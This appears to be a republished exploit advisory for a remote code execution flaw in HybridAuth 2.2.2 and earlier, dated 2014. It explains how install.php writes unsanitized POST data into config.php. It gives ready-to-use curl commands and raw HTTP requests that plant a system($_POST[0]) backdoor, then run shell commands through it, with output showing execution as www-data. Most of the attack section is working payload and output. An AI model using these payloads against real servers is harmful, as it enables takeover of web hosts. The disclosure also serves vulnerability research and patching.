扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 |
###################################################################### #_ ____ _______________ #| | / _ \| \ | |/ ___|/ ___|/ \|_ _| #| || | | |\| | |_| | / _ \ | | #| |__| |_| | |\| |_| | |___ / ___ \| | #|_____\___/|_| \_|\____|\____/_/ \_\_| # # HybridAuth <= 2.2.2 Remote Code Execution # Website : http://hybridauth.sourceforge.net/ # Exploit Author : @u0x (Pichaya Morimoto) # Release dates : August 5, 2014 # # Special Thanks to 2600 Thailand group # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ # ######################################################################## [+] Description ============================================================ HybridAuth enable developers to easily build social applications to engage websites vistors and customers on a social level by implementing social signin, social sharing, users profiles, friends list, activities stream, status updates and more. [+] Exploit (New Version) ============================================================ I just found that the latest development version (2.2.2-dev) in Github was trying to patch this months ago. https://github.com/hybridauth/hybridauth/commit/574953517cda02eb631d68879bbc4f203fd203b9#diff-7fa84e199bd97f30cea5aea71735379c ... function stringSanitization($string) { $string = strip_tags($string); $string = htmlentities($string, ENT_QUOTES, 'UTF-8'); return $string; } ... foreach( $_POST AS $k => $v ): $v = stringSanitization($v); <--- sanitize ??? $k = stringSanitization($k); <--- sanitize ??? $z = "#$k#"; $CONFIG_TEMPLATE = str_replace( $z, $v, $CONFIG_TEMPLATE ); endforeach; ... However, the sanitization is not sufficient to prevent PHP code injection. We can inject to next value that will never be sanitized with htmlentities() :/ Note that the default installation leave "install.php" untouched. $ curl http://victim/hybridauth/install.php -d 'OPENID_ADAPTER_STATUS=system($_POST[0]))));/*' $ curl http://victim/hybridauth/config.php -d '0=id;ls -lha' [+] Proof-of-Concept ============================================================ PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 1. Inject Evil PHP Backdoor POST /hybridauth_git/install.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: th,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 45 OPENID_ADAPTER_STATUS=system($_POST[0]))));/* HTTP/1.1 200 OK Date: Tue, 05 Aug 2014 02:13:52 GMT Server: Apache X-Powered-By: PHP/5.5.9-1ubuntu4.3 Vary: Accept-Encoding X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Length: 2467 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html <!DOCTYPE html> <html lang="en"> <head> <title>HybridAuth Installer</title> ... 2. Gaining access to the PHP backdoor POST /hybridauth_git/config.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: th,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 14 0=id;ls%20-lha HTTP/1.1 200 OK Date: Tue, 05 Aug 2014 02:15:16 GMT Server: Apache X-Powered-By: PHP/5.5.9-1ubuntu4.3 Vary: Accept-Encoding X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Length: 397 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html uid=33(www-data) gid=33(www-data) groups=33(www-data) total 76K drwxrwxrwx3 longcat longcat 4.0K Aug5 08:34 . drwxrwxr-x 25 longcat longcat16K Aug5 08:47 .. drwxrwxrwx5 longcat longcat 4.0K Aug5 08:34 Hybrid - -rwxrwxrwx1 longcat longcat 2.5K Aug5 09:13 config.php - -rwxrwxrwx1 longcat longcat488 Aug5 08:34 index.php - -rwxrwxrwx1 longcat longcat18K Aug5 08:34 install.php [+] Vulnerability Analysis ============================================================ Filename: ./install.php ... function stringSanitization($string) { $string = strip_tags($string); $string = htmlentities($string, ENT_QUOTES, 'UTF-8'); <-- LoL return $string; } ... if( count( $_POST ) ): <-- user controlled input HTTP POST data \/-- Read a template file $CONFIG_TEMPLATE = file_get_contents( "Hybrid/resources/config.php.tpl" ); foreach( $_POST AS $k => $v ): $v = stringSanitization($v); $k = stringSanitization($k); $z = "#$k#"; \/-- #POST data's keys# found in template file will be replaced with POST data's values | so we can simply replace these existing values with something fun :) $CONFIG_TEMPLATE = str_replace( $z, $v, $CONFIG_TEMPLATE ); endforeach; ... \/-- upload that replaced template contents into config.php $is_installed = file_put_contents( $GLOBAL_HYBRID_AUTH_PATH_BASE . "config.php",$CONFIG_TEMPLATE ); ... Filename: ./Hybrid/resources/config.php.tpl ... return array( "base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#", "providers" => array ( // openid providers "OpenID" => array ( "enabled" => #OPENID_ADAPTER_STATUS# <-- #..# will be replaced with arbitrary PHP code ), ... So this is what injected "config.php" looks like... Filename: ./config.php <?php ... return array( "base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#", "providers" => array ( // openid providers "OpenID" => array ( "enabled" => system($_POST[0]))));/* ), ... Pwned again, LongCat |
体验盒子
